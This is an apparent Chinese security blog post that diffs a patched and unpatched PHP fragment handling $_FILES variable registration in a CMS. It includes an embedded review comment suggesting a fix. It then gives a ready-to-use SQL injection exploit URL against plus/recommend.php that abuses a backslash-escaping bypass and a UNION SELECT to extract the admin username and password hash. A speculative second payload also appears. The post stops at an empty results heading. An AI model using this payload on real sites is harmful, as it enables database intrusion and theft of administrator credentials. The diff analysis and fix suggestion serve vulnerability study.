from:http://p2j.cn/?p=798
对比了下补丁文件//正在比较文件 3.php 和 4.PHP
//***** 修补后.php
}
//$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
$$_key = $_FILES[$_key]['tmp_name'] = $_FILES[$_key]['tmp_name'];
${$_key.'_name'} = $_FILES[$_key]['name'];
//***** 修补前.PHP
}
$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);
//吧$_FILES[$_key]['tmp_name']里面的\\\\替换为\\
${$_key.'_name'} = $_FILES[$_key]['name'];
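Review bot: The patched line (`$$_key = $_FILES[$_key]['tmp_name'] = $_FILES[$_key]['tmp_name'];`) still mirrors a client-chosen `$_FILES` key into a global variable of the same name, so dropping the backslash-collapsing `str_replace` closes one escaping bypass but leaves the variable-variable registration itself in place — the `_FILES[type][tmp_name]` entry that the exploit URL below builds on is exactly that path. Whether the enclosing loop restricts `$_key` cannot be seen here: the block is closed by the `}` at the top of the listing and the loop header and its end lie outside the compared fragment. If the request path can populate `$_FILES` from query parameters, as the `?_FILES[...]` form of the exploit suggests, a genuine upload entry should first be required, e.g. `if (!is_uploaded_file($_FILES[$_key]['tmp_name'])) { continue; }` before the assignment, so forged entries are never registered. The stronger fix is to stop assigning `$$_key` altogether and have callers read `$_FILES` directly.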
/*****以下属于推测（未经验证）
?_FILES[aid][name]=0&_FILES[aid][type]=1&_FILES[aid][size]=1&_FILES[aid][tmp_name]=abc\'
修补前，上面这个请求猜测可以让 $aid 的值变成 abc\\'（str_replace 把两个反斜杠折叠成一个），具体过程没有验证。
*******推测完毕********/
这里只给出 exp（请把 0day5.com 换成你已获授权测试的站点）：http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
测试效果: